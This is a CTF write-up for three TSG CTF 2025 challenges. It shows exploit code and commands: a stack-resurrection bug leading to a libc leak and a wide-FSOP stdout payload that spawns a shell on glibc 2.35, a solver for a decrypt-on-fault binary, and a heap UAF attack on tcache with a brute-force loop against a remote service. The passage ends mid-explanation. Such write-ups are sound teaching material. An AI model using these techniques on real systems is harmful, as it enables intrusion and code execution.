TSG CTF 2025 Writeups

index

pwn - TSG LAND

we get a binary named chall :

tlsbollei@tlsbollei mnt/.../tsg-land file chall
chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e827c4b6e83ca9168be9be90f2a3d2d62dc62b49, not stripped
tlsbollei@tlsbollei mnt/.../tsg-land checksec chall
[*] '/mnt/c/Users/tlsbo/Downloads/tsg-land/tsg-land/chall'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    RUNPATH:    b'.'
    Stripped:   No
tlsbollei@tlsbollei mnt/.../tsg-land

source code is as follows :

1
#include <setjmp.h>
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include <string.h>
5
#include <time.h>
6

7
jmp_buf env[5];
8
int launched[5];
9

10
void init() {
11
    setvbuf(stdout, NULL, _IONBF, 0);
12
}
13

14
int read_int(char *prompt) {
15
    int x;
16
    printf("%s > ", prompt);
17
    scanf("%d", &x);
18
    for (;getchar() != '\n';);
19
    return x;
20
}
21

22
void notepad() {
23
    void *_[99]; // padding
24
    char *buf = malloc(0x1000);
25
    if (buf == NULL) {
26
        return;
27
    }
28
    if (setjmp(env[1]) != 0) {
29
        printf("saved content: %s\n", buf);
30
    }
31
    for (;;) {
32
        int q = read_int("1: edit, 0: save and quit");
33
        if (q == 0) {
34
            longjmp(env[0], 1);
35
        } else {
36
            printf("enter the content > ");
37
            fgets(buf, 0x1000, stdin);
38
        }
39
    }
40
}
41

42
void pwquiz() {
43
    void *_[100]; // padding
44
    char *hints[3] = {
45
        "Hint 1: an English word",
46
        "Hint 2: length is 8",
47
        "Hint 3: the most used password in the world"
48
    };
49

50
    setjmp(env[2]);
51

52
    for (;;) {
53
        int q = read_int("1~3: hint, 4: answer, 0: quit");
54
        if (q == 0) {
55
            longjmp(env[0], 1);
56
        } else if (1 <= q && q <= 3) {
57
            printf("%s\n", hints[q-1]);
58
        } else if (q == 4) {
59
            char buf[16];
60
            printf("answer > ");
61
            scanf("%15s", buf);
62
            if (strcmp("password", buf) == 0) {
63
                puts("Congraturations!!!");
64
                longjmp(env[0], 123456);
65
            } else {
66
                puts("...");
67
            }
68
        }
69
    }
70
}
71

72
struct board {
73
    int board[16];
74
    int sx;
75
    int sy;
76
};
77

78
void move(struct board *b, char m) {
79
    if (b->sx < 0 || 3 < b->sx || b->sy < 0 || 3 < b->sy) {
80
        return;
81
    }
82
    switch (m) { // left, down, up, right
83
        case 'a': // left
84
            if (b->sx < 3) {
85
                b->board[b->sy*4 + b->sx] = b->board[b->sy*4 + b->sx + 1];
86
                b->sx++;
87
            }
88
            break;
89
        case's': // down
90
            if (b->sy > 0) {
91
                b->board[b->sy*4 + b->sx] = b->board[(b->sy-1)*4 + b->sx];
92
                b->sy--;
93
            }
94
            break;
95
        case 'w': // up
96
            if (b->sy < 3) {
97
                b->board[b->sy*4 + b->sx] = b->board[(b->sy+1)*4 + b->sx];
98
                b->sy++;
99
            }
100
            break;
101
        case 'd': // right
102
            if (b->sx > 0) {
103
                b->board[b->sy*4 + b->sx] = b->board[b->sy*4 + b->sx - 1];
104
                b->sx--;
105
            }
106
            break;
107
        default:
108
            break;
109
    }
110
}
111

112
void print_board(struct board *b) {
113
    for (int i = 0; i < 4; i++) {
114
        for (int j = 0; j < 4; j++) {
115
            if (i == b->sy && j == b->sx) {
116
                printf("[] ");
117
            } else {
118
                printf("%02d ", b->board[i*4+j]);
119
            }
120
        }
121
        puts("");
122
    }
123
}
124

125
int judge(struct board *b) {
126
    for (int i = 0; i < 15; i++) {
127
        if (b->board[i] != i) {
128
            return 0;
129
        }
130
    }
131
    return 1;
132
}
133

134
void slide_puzzle() {
135
    srand(time(NULL));
136
    void *_[100]; // padding
137
    struct board b = {{}, 3, 3};
138
    for (int i = 0; i < 16; i++) {
139
        b.board[i] = i;
140
    }
141

142
    // randomize board
143
    for (int i = 0; i < 100; i++) {
144
         move(&b, "aswd"[rand()%4]);
145
    }
146

147
    // move space to bottom-right
148
    move(&b, 'a');
149
    move(&b, 'a');
150
    move(&b, 'a');
151
    move(&b, 'w');
152
    move(&b, 'w');
153
    move(&b, 'w');
154

155
    setjmp(env[3]);
156

157
    for (;;) {
158
        print_board(&b);
159
        printf("a: left, s: down, w: up, d: right, q: save and quit > ");
160
        char c = getchar();
161
        if (c == 'q') {
162
            longjmp(env[0], 1);
163
        } else if (c != '\n') {
164
            move(&b, c);
165
            if (judge(&b)) {
166
                print_board(&b);
167
                puts("Congraturations!");
168
                launched[3] = 0;
169
                longjmp(env[0], 1);
170
            }
171
        }
172
    }
173
}
174

175
void int_float_translater() {
176
    void *_[94]; // padding
177
    unsigned long num;
178
    char *__ = alloca(100); // padding 2
179

180
    setjmp(env[4]);
181

182
    for (;;) {
183
        int q = read_int("1: uint64 to float64, 2: float64 to uint64, 0: quit");
184
        switch (q) {
185
            case 1:
186
                printf("num(uint64) > ");
187
                scanf("%ld", &num);
188
                for (;getchar() != '\n';);
189
                printf("%1$ld = %2$f = %2$e\n", num, *(double *)&num);
190
                break;
191
            case 2:
192
                printf("num(float64) > ");
193
                scanf("%lf", (double *)&num);
194
                for (;getchar() != '\n';);
195
                printf("%1$f = %2$ld = 0x%2$lx\n", *(double *)&num, num);
196
                break;
197
            case 0:
198
                longjmp(env[0], 1);
199
            default:
200
                break;
201
        }
202
    }
203
}
204

205
void *apps[5] = {NULL, notepad, pwquiz, slide_puzzle, int_float_translater};
206

207
void print_desktop() {
208
    puts("...");
209
    puts("1: notepad.exe");
210
    puts("2: password ate quiz ~returns~");
211
    puts("3: 4x4 slide puzzle");
212
    puts("4: int float translater");
213
    puts("0: exit TSG LAND");
214
}
215

216
int main() {
217
    init();
218
    puts("Welcome to TSG LAND!!!");
219
    int res = setjmp(env[0]);
220
    if (res == 123456) {
221
        puts("You are pw-ate-quiz m@ster!");
222
    } else if (res != 0) {
223
        puts("Welcome back!");
224
    }
225

226
    for (;;) {
227
        print_desktop();
228
        int q = read_int("May I help you?");
229
        if (q <= -1 || 5 <= q) {
230
            puts("invalid command");
231
        } else if (q == 0) {
232
            puts("bye");
233
            exit(0);
234
        } else {
235
            if (launched[q]) {
236
                longjmp(env[q], 1);
237
            } else {
238
                launched[q] = 1;
239
                ((void(*)())apps[q])();
240
            }
241
        }
242
    }
243
}

The bug we hold onto

The bug is longjmp into a dead stack frame. main() saves env[0] with _setjmp, then later resumes apps by longjmp(env[q], 1) if they were launched before.

1
1cc7: lea env(%rip),%rax
2
1cd1: call 1080 <_setjmp@plt>   # save env[0] here
3
1d7c: test %eax,%eax
4
1d7e: []                       # if launched[q] != 0
5
1da7: mov $0x1,%esi
6
1dac: mov %rax,%rdi             # rdi = &env[q]
7
1daf: call 10e0 <longjmp@plt>    # jump back into app

These apps don’t return normally; they quit using longjmp(env[0], 1). Once an app has jumped back into main, its stack frame is dead: main keeps running (and calling other functions) on the same stack region, so the saved env[q] no longer describes a valid call chain. Despite this, main later jumps back into the app with longjmp(env[q], 1), so this is a stack resurrection vulnerability.

Defeating PIE using print leaks

So, what can we use our stack resurrection vulnerability for? Simply put, because different functions overlap the same dead stack frame, we can corrupt local variables. You may already notice which local variable we can corrupt to get an arbitrary read plus write, but I’ll get to that later. First, we need to defeat PIE by getting a leak.

We notice a key observation and that is that pwquiz stores rodata pointers on its stack

1
13b1: lea 0x2053(%rip),%rax   # hint 1
2
13b8: mov %rax,-0x340(%rbp)
3

4
13bf: lea 0x206b(%rip),%rax   # hint 2
5
13c6: mov %rax,-0x338(%rbp)
6

7
13cd: lea 0x2080(%rip),%rax   # hint 3
8
13d4: mov %rax,-0x330(%rbp)

dumping .rodata really confirms our finding :

1
2080: "Hint 3: the most used password in the world\0"

Second key observation is that slide_puzzle’s board starts at the exact same stack offset, which beautifully complements our initial hypothesis. In slide_puzzle, we can see that the board struct lives at rbp-0x330

1
18f6: lea -0x330(%rbp),%rax
2
19a5: mov %rax,%rdi
3
19a8: call 1713 <print_board> # prints b.board[] as ints

we can finalize:

pwquiz: the local at -0x330(%rbp) contains the 64-bit pointer PIE_base + 0x2080 (the "Hint 3" string)
slide_puzzle: b.board[0] is the first 4 bytes at rbp-0x330
slide_puzzle: b.board[1] is the next 4 bytes at rbp-0x32c

and so, because of our stack resurrection bug, after running pwquiz() and then resuming slide_puzzle() via longjmp(env[3],1), the memory at rbp-0x330 is no longer the puzzle tiles; it is whatever pwquiz left there.

What to do with this information?

Because print_board prints each element as an int

1
1778: mov (%rax,%rdx,4),%eax   # load b->board[idx]
2
178c: call 1050 <printf@plt>   # "%02d"

We can exploit this as follows :

1
leak = (board[0][1] << 32) | board[0][0]
2
baseaddr = leak - 0x2080

this works because leak == PIE_base + 0x2080 (the address of our third hint), and you subtract the known rodata offset 0x2080 to get the PIE base. that is also why the constant is exactly 0x2080, it is not random, it is the rodata symbol that pwquiz leaves behind at the exact overlapping stack slot.

translator + puzzle moves becomes our write primitive

we can use the 4x4 puzzle as a 32bit shuffler. this is because the move() function literally copies ints around and does:

1
...load neighbor int..
2
15ad: movslq %esi,%rdx
3
15b0: mov %ecx,(%rax,%rdx,4)   # neighbor write to blank slot

so each move does not “swap tiles”; instead, it copies an int from a neighbor into the blank position and updates sx/sy. this means we can route specific 32-bit values through the grid along a known path, but we still need a way to place a value we control onto the grid.

how translator steps in our equation

translator scans into a local 64-bit num at rbp-0x310

1
1b64: lea -0x310(%rbp),%rax
2
1b78: call __isoc99_scanf@plt   # scanf("%ld", &num) from our source

translator lets you place 8 controlled bytes onto its stack frame. with the stack resurrection bug, those bytes land inside other app locals. here is a holy shit moment :

slide_puzzle board base: rbp-0x330, and notepad pointer buf lives at rbp-0x328. that means the notepad pointer overlaps puzzle elements board[2] and board[3]. and we can see in the source.. printf("%s", buf), fgets(buf, 0x1000, stdin). this gives us an arbitrary read AND write!

notepad magic

confirming our logic above:

1
12d2: call malloc@plt
2
12d7: mov %rax,-0x328(%rbp)     # save buf pointer

and when we resume notepad using setjmp != 0, we do printf("%s", buf)

1
12f6: call _setjmp@plt          # env[1]
2
12fb: test %eax,%eax
3
12fd: je 131d
4
12ff: mov -0x328(%rbp),%rax     # load buf pointer
5
1309: lea 0x2011(%rip),%rdi     # "saved content: %s\n"
6
1318: call printf@plt

so if we corrupt this pointer at rbp-0x328, we can get an arbitrary read via %s, and our foreshadowed arbitrary write looks like this:

1
136a: mov -0x328(%rbp),%rax     # buf pointer
2
1371: mov $0x1000,%esi
3
1379: call fgets@plt            # writes our bytes to *buf, nice

Important (the game of the exploit)

the exploit's entire game is: use translator + puzzle moves to rewrite notepad's saved buf pointer, giving us AAR and AAW.

leaking the libc

we do :

1
translator(chall.got.puts & 0xffffffff)
2
puzzle('<>')
3
io.sendlineafter(b'? > ', b'1')
4
io.recvuntil(b'saved content: ')
5
libc.address = u64(io.recvline().strip().ljust(8, b'\x00')) - libc.sym.puts

we write only the low 32 bits of the desired pointer, which is the puts@GOT address. the high bits of the notepad buf pointer were originally those of a heap pointer like 0x00005555........, and PIE mappings are also typically at 0x00005555........ both locally and on the remote. so changing only the low dword often retargets the pointer from the heap to the PIE region. that's why we use & 0xffffffff.

notepad resumes
printf("%s", buf) reads bytes at puts@GOT
GOT holds the resolved libc address of puts
subtract libc.sym.puts and we get libc base

FSOP

now we want notepad's fgets to write into the libc stdout FILE object, which is at 0x7f........ rather than 0x00005555........, so we overwrite both halves of the pointer

1
translator((_IO_2_1_stdout_ >> 32) & 0xffffffff)
2
translator(_IO_2_1_stdout_ & 0xffffffff)

after these two shuffles, notepad saved pointer becomes:

1
buf == libc.sym._IO_2_1_stdout_

so the fgets of notepad becomes a write directly into libc global stdout struct, which is exactly FSOP.

brain freeze

right. FSOP. but… wasnt that patched in like glibc ≥2.24/2.27? Checking the version of the handout libc shows:

tlsbollei@tlsbollei mnt/.../tsg-land strings libc.so.6 | grep "GNU C Library"
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.11) stable release version 2.35.
tlsbollei@tlsbollei mnt/.../tsg-land

2.35. Not good. After 25 minutes of staring into a wall, I realized that we can just use ideas that remain valid. As per vtable bypass articles,

Important (FILE structure exploitation)

You can not just point a FILEs vtable to an arbitrary fake jump table anymore, because glibc validates the vtable pointer is inside the read-only __libc_IO_vtables region (or it sends us to hell).

our exploit still works on glibc 2.35 because we do not rely on an arbitrary vtable anywhere, we can use two ideas that remain valid:

Pick a vtable that is already inside __libc_IO_vtables (so the check passes)
Pivot into wide-IO and hijack _wide_vtable, which historically is not validated by the same IO_validate_vtable() fast-path (House of Paper, wide FSOP style)

confirming write-what-where into stdout

notepad local pointer is stored at rbp-0x328 and used as the destination for fgets:

1
12d2: call   malloc@plt
2
12d7: mov    %rax,-0x328(%rbp)      ; save buf pointer
3

4
12ff: mov    -0x328(%rbp),%rax
5
1318: call   printf@plt              ; printf("saved content: %s\n", buf)
6

7
136a: mov    -0x328(%rbp),%rax
8
1379: call   fgets@plt               ; fgets(buf, 0x1000, stdin)

once the exploit corrupts that saved buf pointer to equal libc:_IO_2_1_stdout_, the line:

1
io.sendlineafter(b' > ', fs)

becomes fgets((char *)stdout, 0x1000, stdin), overwriting the real stdout FILE object in libc. additionally, after we return to the menu, the program immediately calls puts a bunch of times in print_desktop

1
1c53: call puts@plt
2
1c62: call puts@plt

so the program naturally triggers stdio after we corrupt stdout.

exploiting

final payload is > corrupt stdout so libc calls system.

1
shellpop = flat({
2
  0x00: b' sh\0...',
3
  0x88: p64(libc.address + 0x21ca60),         #  lock
4
  0xA0: p64(stdout+0xe0),                      # _wide_data
5
  0xC0: p32(-1),                               # _mode = -1 (wide)
6
  0xD8: _IO_wfile_jumps - 0x38 + 0x18,         # vtable (legit libc table)
7
  0xE0+0x68: p64(system),                      #  target
8
})

step by step:

1
0xA0: p64(stdout + 0xe0)

this matches _wide_data being a field in _IO_FILE (glibc struct layout) and is the classic setup for wide FSOP.

1
0xC0: p32(-1)    # _mode = -1

setting _mode negative pushes glibc down wide-character code paths (where _wide_data is used heavily).

1
0xD8: _IO_wfile_jumps - 0x38 + 0x18   # _IO_wfile_jumps - 0x20

this is the part that keeps the FSOP compatible with patched glibc: _IO_wfile_jumps is a real libc jump table living in the __libc_IO_vtables region, so we pass the vtable check, and the small subtraction is a common trick because the validator only checks that the pointer is in range, not that it is an exact symbol start.

1
0x88: p64(libc.address + 0x21ca60)

glibc may lock the stream, if _lock is garbage, we crash. so we give it a pointer to a valid lock object in libc.

wide-vtable pivot and why the patch does not save it

1
w_offset = 0xE0
2
w_offset+0x68: p64(system)
3
w_offset+0xE0: p64(stdout + 0xe0)

we place a wide_data object at stdout+0xe0 and at the end of that object, we set _wide_vtable = stdout+0xe0, so wide_vtable points into our own controlled memory. inside this fake vtable, at offset 0x68, we put the function pointer system. when libc takes a wide-IO path and does something like “call the wide overflow/put function via _wide_vtable”, it will fetch the pointer we planted and call it, which in our case, is system.

why system(“sh”) works even though the signature is bad

in these wide-vtable FSOP chains, the call site typically passes the FILE* as the first argument (in rdi on amd64). If we replace that target with system, then system(rdi) treats that FILE* pointer as a char*. so we put the cmd string at the start of the FILE object:

1
0x00: b' sh\0...',

when our corrupted code path calls our planted system, it becomes

1
system((char*)stdout)

and since stdout begins with " sh\0" (the shell ignores the leading space), we get a shell

The Game

rev - medicine

┌──(tlsbollei㉿tlsbollei)-[/mnt/c/Users/tlsbo/Downloads/medicine/medicine]
└─$ file medicine
medicine: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c540100314c537435ffa30d942a013f0f3bbde6a, for GNU/Linux 4.4.0, stripped

┌──(tlsbollei㉿tlsbollei)-[/mnt/c/Users/tlsbo/Downloads/medicine/medicine]
└─$ ./medicine
flag? flag{bbb}
Wrong ;(

input gate :

1
void __fastcall __noreturn main(int a1, char **a2, char **a3)
2
{
3
  char v3[40]; // [rsp+0h] [rbp-38h] BYREF
4
  unsigned __int64 v4; // [rsp+28h] [rbp-10h]
5

6
  v4 = __readfsqword(0x28u);
7
  printf("flag? ");
8
  if ( (unsigned int)__isoc23_scanf("%32s", v3) == 1 && strlen(v3) == 32 )
9
    BUG();
10
  sub_1200();
11
}

__isoc23_scanf("%32s", v3) and strlen(v3) == 32 which then branches into BUG() which is our protected/decrypted path. Failure path is sub_1200(), which looks as follows

1
void __noreturn sub_1200()
2
{
3
  _QWORD buf[3]; // [rsp+Eh] [rbp-1Ah] BYREF
4

5
  *(_QWORD *)((char *)&buf[1] + 2) = __readfsqword(0x28u);
6
  strcpy((char *)buf, "Wrong ;(\n");
7
  write(1, buf, 9u);
8
  _exit(1);
9
}

this fixed string and the function fixed address (.text+0x1200) are crucial for the offline recovery.

initialization of SIGILL handler

1
unsigned __int64 sub_132F()
2
{
3
  __int64 v0; // rax
4
  struct sigaction v2; // [rsp+0h] [rbp-A8h] BYREF
5
  unsigned __int64 v3; // [rsp+98h] [rbp-10h]
6

7
  v3 = __readfsqword(0x28u);
8
  setvbuf(stdin, 0, 2, 0);
9
  setvbuf(stdout, 0, 2, 0);
10
  setvbuf(stderr, 0, 2, 0);
11
  memset(&v2.sa_mask, 0, 0x90u);
12
  v2.sa_handler = (__sighandler_t)sub_12A4;
13
  v2.sa_flags = 4;
14
  sigemptyset(&v2.sa_mask);
15
  if ( sigaction(4, &v2, 0) )
16
    __assert_fail("sigaction(SIGILL, &action, NULL) == 0", "chal.c", 0x43u, "init");
17
  v0 = sysconf(30);
18
  if ( mprotect(
19
         (void *)((unsigned __int64)&loc_1500 & -v0),
20
         (-v0 & ((unsigned __int64)&loc_1500 + v0 + 1663)) - ((unsigned __int64)&loc_1500 & -v0),
21
         7) )
22
  {
23
    __assert_fail(
24
      "mprotect((void*)start, end - start, PROT_READ | PROT_WRITE | PROT_EXEC) == 0",
25
      "chal.c",
26
      0x49u,
27
      "init");
28
  }
29
  return v3 - __readfsqword(0x28u);
30
}

SIGILL handler is installed via v2.sa_handler = (__sighandler_t)sub_12A4; and sigaction(4, &v2, 0), and the code page containing loc_1500 is made RWX with mprotect with flag 7 (PROT_READ | PROT_WRITE | PROT_EXEC), with the protected tail size being bounded explicitly by 1663. This is our self-modifying region.

ROT13 routine

in sub_126A we can see the raw decomp of the rot13 routine:

1
__int64 __fastcall sub_126A(_BYTE *a1)
2
{
3
  __int64 result; // rax
4

5
  for ( result = (unsigned __int8)*a1; (_BYTE)result; result = (unsigned __int8)*a1 )
6
  {
7
    if ( (unsigned __int8)((result & 0xDF) - 65) <= 0x19u )
8
    {
9
      if ( (unsigned __int8)(result - 78) <= 0xCu || (char)result > 109 )
10
        *a1 = result - 13;
11
      else
12
        *a1 = result + 13;
13
    }
14
    ++a1;
15
  }
16
  return result;
17
}

important is the alpha range check ((result & 0xDF) - 65) <= 0x19u and the *a1 = result - 13; else; *a1 = result + 13; transform on the a1 pointer

SIGILL handler and decrypting per fault

1
__int16 __fastcall sub_12A4(__int64 a1, __int64 a2, _QWORD *a3)
2
{
3
  _WORD *v3; // rbx
4
  char *v5; // r12
5
  _WORD *v6; // rdx
6
  char *v7; // rcx
7
  __int16 result; // ax
8

9
  v3 = (_WORD *)a3[21];
10
  if ( ((unsigned __int8)v3 & 0x3F) != 0 || (_WORD *)qword_40B0 == v3 )
11
    sub_1200();
12
  v5 = (char *)a3[20];
13
  qword_40B0 = a3[21];
14
  sub_126A(v5);
15
  v6 = v3;
16
  v7 = v5;
17
  do
18
  {
19
    result = 3525 * *v7 + 15842;
20
    *v6++ ^= result;
21
    ++v7;
22
  }
23
  while ( v7 != v5 + 32 );
24
  ++a3[19];
25
  return result;
26
}

this confirms a variety of my suspicions: ((unsigned __int8)v3 & 0x3F) != 0 enforces 64 byte alignment; qword_40B0 == v3 prevents repeating the same block; sub_126A(v5); runs on every SIGILL, so the ROT13 of the key toggles each time; and the loop runs 32 iterations, with each iteration XORing one _WORD, so 32 x 2 bytes == 64 bytes are decrypted per fault. the mask function is mask16 = (3525 * keyByte + 15842) mod 2^16

TL;DR in case of confusion

this binary implements a “decrypt-on-fault” scheme that uses CPU faults to progressively decrypt its own code. the program reads exactly 32 bytes from the user (the “flag”). If it’s not exactly 32 bytes, it exits immediately with “Wrong ;(\n”. during initialization, the binary installs a custom signal handler for SIGILL (Signal 4, illegal instruction). it also makes a region of code RWX using mprotect. a 1663-byte encrypted tail sits in the .text section starting at address loc_1500, filled with invalid instructions (UD2 = 0F 0B). as the program runs, it executes an invalid instruction (SIGILL) which forces the signal handler to decrypt exactly 64 bytes of ciphertext code in place using the user key, which is our 32 byte flag input, and execution resumes from our newly decrypted code. given we provide the binary with the correct flag, this process is repeated until we successfully decrypt all of the invalid instructions into valid ones, and we reach the point in the binary where our flag is confirmed to be correct.

offline recovery and how to solve?

call sub_1200 becomes a perfect proxy for us, and that is because a call rel32 instruction is encoded as E8 plus 4 byte little endian displacement, where displacement = target - (callsite + 5). in our binary, sub_1200 is at .text+0x1200. therefore, for any candidate callsite address p, the plaintext bytes are fully determined. this is because encryption is XOR on 16 bit words :

cipherWord = plainWord XOR mask16 ==> mask16 = cipherWord XOR plainWord

and mask16 must equal (3525*keyByte + 15842) & 0xFFFF for some key byte.

inverting mask16 to keyByte

we precompute a reverse table for all 256 bytes:

1
mask16(b) = (3525*b + 15842) & 0xFFFF
2
rev[mask16(b)] = b

from the handler,

1
sub_126A(v5);

since ROT13 is an involution (a function, transformation, or operator that is equal to its inverse, i.e. which gives the identity when applied to itself.), the key alternates per decrypted block:

block0 uses rot13(flag)
block1 uses flag
block2 uses rot13(flag)
(and so on, alternating)

therefore, once we recover the used byte for an even block, we ROT13 it back to get the real flag byte

dumping the encrypted tail

because of the LOAD mapping (Offset == VirtAddr for the .text segment), the encrypted region starts at loc_1500, which is file offset 0x1500. The RWX page is 0x1000..0x1FFF, and the protected tail spans roughly 0x1500..0x1500+1663.

dd if=./medicine of=tailpage.bin bs=1 skip=$((0x1500)) count=$((0x2000-0x1500)) status=none

and here we have our solve

1
#!/usr/bin/env python3
2
from pathlib import Path
3
from collections import Counter
4

5
A = 3525
6
B = 15842
7

8
data = Path("medicine").read_bytes()
9

10
mask_to_key = {}
11
for key_byte in range(256):
12
    mask = (A * key_byte + B) & 0xFFFF
13
    mask_to_key[mask] = key_byte
14

15
def rot13(ch):
16
    if 65 <= ch <= 90:
17
        ch = ((ch - 65 + 13) % 26) + 65
18
    elif 97 <= ch <= 122:
19
        ch = ((ch - 97 + 13) % 26) + 97
20
    return ch
21

22
votes = [Counter() for _ in range(32)]
23

24
for callsite in range(0x1500, 0x2000 - 5):
25
    disp = (0x1200 - (callsite + 5)) & 0xFFFFFFFF
26
    call_plain = bytes([0xE8]) + disp.to_bytes(4, 'little')
27

28
    block_base = callsite & ~0x3F
29
    block_idx = (block_base - 0x1500) // 64
30
    is_even_block = (block_idx % 2 == 0)
31

32
    recovered = {}
33
    for word_idx in range(32):
34
        word_addr = block_base + 2 * word_idx
35

36
        if word_addr >= callsite and word_addr + 1 < callsite + 5:
37
            offset_in_call = word_addr - callsite
38

39
            b0 = call_plain[offset_in_call]
40
            b1 = call_plain[offset_in_call + 1]
41
            plain_word = b0 | (b1 << 8)
42

43
            cipher_word = int.from_bytes(data[word_addr:word_addr+2], 'little')
44

45
            mask = cipher_word ^ plain_word
46

47
            if mask in mask_to_key:
48
                key_byte = mask_to_key[mask]
49

50
                if is_even_block:
51
                    flag_byte = rot13(key_byte)
52
                else:
53
                    flag_byte = key_byte
54

55
                if 32 <= flag_byte <= 126:
56
                    recovered[word_idx] = flag_byte
57

58
    if recovered:
59
        for idx, val in recovered.items():
60
            votes[idx][val] += len(recovered)
61

62
result = bytearray(32)
63
result[0:5] = b"TSGCT"
64

65
for i in range(5, 32):
66
    if votes[i]:
67
        result[i] = votes[i].most_common(1)[0][0]
68
    else:
69
        result[i] = ord('?')
70

71
print(result.decode())

TSGCTF{51gn4l_h4ndl3r_r0t13_x0r}

pwn - XMLTreeDump

tlsbollei@tlsbollei mnt/.../XMLTreeDump pwn checksec XMLTreeDump
[*] '/mnt/c/Users/tlsbo/Downloads/XMLTreeDump/XMLTreeDump/XMLTreeDump'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
tlsbollei@tlsbollei mnt/.../XMLTreeDump

root bug, xml_decl_loc becomes a dangling pointer, then delete() frees garbage

in XmlParser::parse_xml_decl(), the program creates a local XmlDecl xml_decl; and pushes it into:

1
std::vector<std::variant<XmlNode, XmlDecl>> originals;
2
originals.push_back(std::move(xml_decl));
3
return std::get<XmlDecl>(originals.back());

so it returns a reference to the XmlDecl object stored inside originals. XmlParser::parse_element() contains the dangerous sequence: when it encounters <?xml ...?>, if this->xml_decl_loc is already set, it destroys and frees it (operator delete(x, 0x40)), then sets it to &parse_xml_decl()

therefore,

1
if (this->xml_decl_loc) delete this->xml_decl_loc;   // <-- delete pointer into originals storage
2
this->xml_decl_loc = &parse_xml_decl();              // <-- pointer into originals buffer

why the pointer becomes dangling

in the constructor:

1
originals.reserve(10);

also in parse_element()

1
if (node.name == "root") originals.push_back(node);

therefore by nesting/creating enough <root>xyz</root> tags, you force originals to exceed capacity 10 ==> vector reallocates ==> the old buffer is freed ==> all references into it (including xml_decl_loc) become dangling.

then the next <?xml ...?> executes delete xml_decl_loc on a stale pointer into freed memory, which is our exploit entry.

what primitive is this

definitely not a free(anything) primitive, but it is still a strong one in our case, as we can make delete(xml_decl_loc) call free() on an address that used to be inside a freed vector buffer. with heap feng shui (grooming), we can make that stale pointer line up with a real malloc chunk user pointer we care about. therefore, the intended target is tcache_perthread_struct

free tcache_perthread_struct

what is tcache_perthread_struct

in glibc 2.3x, simplified :

1
struct tcache_perthread_struct {
2
  uint16_t counts[TCACHE_MAX_BINS];   // 64 * 2 = 0x80
3
  void*    entries[TCACHE_MAX_BINS];  // 64 * 8 = 0x200
4
};                                     // total = 0x280 (640)

the total number 0x280 is our gate in, we can build a blob and assert :

1
assert(len(payload_rop) == 640)

so our exploit plan is to use the UAF delete(xml_decl_loc) to free the live tcache struct chunk, immediately allocate exactly the same size to reclaim it and overwrite counts[] and entries[], so now we control the allocators per-thread cache.

big problem - no leak

we do not have a heap leak, which is a problem. we need to get the stale pointer used by delete(xml_decl_loc) to land exactly on the tcache struct chunk, which is ASLR/alignment lottery. because modern libc does safe-linking as follows,

1
stored_pointer = actual_pointer ^ (chunk_address >> 12)

which shifts out the low 12 bits of the chunk address and keeps only the upper bits (which identify the heap page); these shifted bits act as an obfuscation key.

the 12-bit lottery

we control the relative positions of the allocations within the heap, the timing of when they get allocated/freed, and the sizes of our allocations. we do not know the absolute heap base. you may ask - PIE is off according to checksec, why are we bruteforcing anything? this is because the brute force isn’t about finding addresses - it’s about making a heap collision happen.

the collision requirement

for the exploit to work, we need

1
dangling_xml_decl_loc == tcache_struct_address
2

3
More specifically, we need the last 12 bits of both addresses to match, because tcache_perthread_struct lives at:
4

5
heap_base + small_offset
6
└───┬───┘   └────┬────┘
7
 unknown    controllable
8
 (ASLR)     (feng shui)

the small_offset part (last 12 bits) we can influence through allocation order/sizes, which as we have clarified, we control.

memory alignment constraints

heap memory is allocated in pages (4KB = 0x1000 bytes).

1
addresses end in: ...000, ...1000, ...2000, ...3000, and more
2
                   └─┬─┘
3
                    These 12 bits (0x000 to 0xFFF) define position within a 4KB window
4

5
malloc chunks are 16-byte aligned
6
Addresses end in: ...00, ...10, ...20, ...30, ...40, and more
7
                      └┬┘
8
                      last 4 bits are also constrained

when we do not know the heap base:

1
Heap could be at: 0x5555_0000_0000
2
              or: 0x5555_0000_1000
3
              or: 0x5555_0000_2000
4
              or: 0x5555_0000_3000
5
              or: 0x5555_0FFF_F000

but within each 4kb page, the relative layout is the same.

if our heap feng shui makes:

dangling_xml_decl_loc end with ..5d0
tcache_struct should be at heap_base + 0x2d0

then we need: heap_base & 0xFFF == 0x300

the last 12 bits of heap_base must be 0x300
there are 2^12 = 4096 possible values for these 12 bits
So 1/4096 chance of success per attempt

and that is exactly what we do, just spam the shit out of the service ☜(⌒▽⌒)☞

1
while True:
2
  try:
3
    io = remote(...)
4
    io.send(payload)
5
    io.recvuntil("flag", timeout=0.1)
6
    break
7
  except:
8
    count += 1

when we win the lottery, delete(xml_decl_loc) frees the real tcache struct chunk.

reclaim the freed tcache struct and overwrite it (controlled tcache)

this is where we use a payload rop. the first 0x80 bytes should be counts[] (uint16), because setting many counts to 1 means “pretend these bins are non empty”. the following 0x200 bytes should be entries[], where we plant pointers for bins we want to malloc() to return. once we reclaim the freed tcache struct with an allocation of the right size, we overwrite:

1
tcache->counts[bin] = 1
2
tcache->entries[bin] = <address we want malloc to give us>

now we can make malloc(size_class(bin)) return a pointer anywhere we choose, as long as we satisfy safe-linking expectations for the next pointer when that chunk is popped.

turn controlled tcache into malloc returning .bss and then malloc returning .got.plt

because of safe-linking, we first make malloc return a writable staging area in .bss where we can build a fake tcache entry, then use that staged fake entry so that a later allocation returns the real target in .got.plt. we implement this as follows:

1
mangle = 0x5f6
2
fake_chunks2 = flat({
3
  0x20: target^mangle
4
})

for tcache singly-linked lists, the next pointer stored in a freed chunk is mangled:

1
stored=next⊕(chunk_addr≫12)

so if we want the allocator to interpret a fake chunk at address CHUNK whose next should be TARGET, we write:

1
*(uint64_t*)CHUNK = TARGET ^ (CHUNK >> 12);

so in our exploit:

1
CHUNK is something like 0x5f65d0 (in .bss)
2
